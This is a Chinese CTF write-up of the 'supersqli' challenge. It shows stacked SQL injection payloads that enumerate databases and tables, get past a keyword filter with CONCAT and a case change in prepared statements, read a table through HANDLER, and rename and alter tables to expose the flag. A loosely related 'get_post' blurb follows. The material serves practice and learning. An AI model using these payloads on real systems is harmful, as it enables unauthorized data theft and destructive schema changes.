攻防世界-supersqli

supersqli

SQL注入题目

尝试判断列数

image-20230327114140278

有两列

判断回显在页面的数据

image-20230327103530481

发现过滤了一些关键字

使用堆叠注入,查看数据库

1';show databases--+

image-20230327114327047

查看supersqli中的表

1';use supersqli;show tables--+

image-20230327114538767

发现两个表,依次查看表中的数据

1';use supersqli;show columns from words--+
1';use supersqli;show columns from `1919810931114514`--+  #这里要查看以数字为表名的表需要加反引号

image-20230327114926466

image-20230327114833905

发现flag在数字表中,同时判断当前正在使用的就是supersqli这个数据库,输入框中输入1就是查询的word表。想要得到flag需要使用的语句为

select flag from `1919810931114514`;

由于过滤了一些关键字,所以想要得到flag可采取预编译、修改flag的名字为id修改1919810931114514为words(即可在搜索框中直接输入即可)

  1. 预编译

    所谓预编译就是将一些灵活的参数值以占位符?的形式给代替掉,我们把参数值给抽取出来,把SQL语句进行模板化。让MySQL服务器执行相同的SQL语句时,不需要在校验、解析SQL语句上面花费重复的时间
    

    预编译语法:

    set @sql = CONCAT('se','lect * from `1919810931114514`;');  #拼接语句
    prepare stmt from @sql; #准备语句  
    EXECUTE stmt;			#执行语句
    

    使用payload

    1';set @s = CONCAT('se','lect * from `1919810931114514`;');prepare sa from @s;EXECUTE sa;--+
    

    image-20230327120621226

    发现利用strstr()函数对set 和 prepare被过滤

    strstr():
    strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。
    注释:该函数是二进制安全的。
    注释:该函数是区分大小写的。如需进行不区分大小写的搜索,请使用 stristr() 函数。
    

    使用大写进行过滤

    1';Set @s = CONCAT('se','lect * from `1919810931114514`;');prepare sa from @s;EXECUTE sa;--+
    

    image-20230327121250876

    得到flag。

  2. 使用handler语法(mysql专用语句

    HANDLER snowy OPEN  [AS] alias
    #打开句柄 表名为snowy 的表,as 别名为 alias
    
    HANDLER snowy READ first
    # 1、通过指定索引查看表,可以指定从索引那一行开始,通过 NEXT 继续浏览
    
    
    # 2、通过索引查看表
    # FIRST: 获取第一行(索引最小的一行)
    # NEXT: 获取下一行
    # PREV: 获取上一行
    # LAST: 获取最后一行(索引最大的一行)
    
    
    HANDLER snowy READ  { FIRST | NEXT | PREV | LAST }
    
    
    # 关闭已打开的句柄
    HANDLER tbl_name CLOSE
    
    
    参考链接:https://blog.csdn.net/qq_43427482/article/details/109898934?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-109898934-blog-114995797.235%5Ev27%5Epc_relevant_recovery_v2&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-109898934-blog-114995797.235%5Ev27%5Epc_relevant_recovery_v2&utm_relevant_index=2
    

    使用payload

    1';use supersqli;handler `1919810931114514` open as p;handler p read first;
    

    image-20230327122226188

  3. 修改表名

    由于没有对alter,rename做出过滤,将1919810931114514修改为words,将flag修改为id,同时将words修改为其他的,将id也修改为其他的。

    利用rename,alter
    1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#
    
    1' or 1=1--+
    

    image-20230327123031191

总结:

  • 由于对一些敏感的方法进行了过滤采取堆叠注入的方法获取一些信息
  • 采用预编译、handler方法(mysql特有)、修改表名来进行后续的解题
  • 同时对strstr、preg_match函数的理解更加深刻。
  • 本次学习中可以得到了一些特殊的绕过方法。
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
攻防世界中,"get_post" 是一个题目,要求学习如何使用GET和POST请求来传递参数。在这个题目中,首先让我们使用GET方式传递一个名为a,值为1的变量。我们只需要在URL窗口输入"/?a=1"并回车即可。接下来,又让我们使用POST方式传递一个名为b,值为2的变量。我们可以使用一些工具来执行这个操作,比如Max Hackbar(Hackbar的替代品)。在Max Hackbar中,我们将题目的地址粘贴到第一个窗口中,在下方窗口中输入"b=2",然后点击"Execution"按钮,即可得到flag。此外,我们也可以使用Python编程代码来发送POST请求,准备要提交的数据并发送请求,然后处理响应并打印出来。以上就是攻防世界中关于"get_post"题目的解答方法。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [C#winform工具模拟getpost请求,app防攻击加密源码](https://download.csdn.net/download/xiaogxiao/9638711)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [攻防世界:get_post](https://blog.csdn.net/qq_57061511/article/details/117886323)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [【攻防世界】get_post](https://blog.csdn.net/m0_74979597/article/details/131676045)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值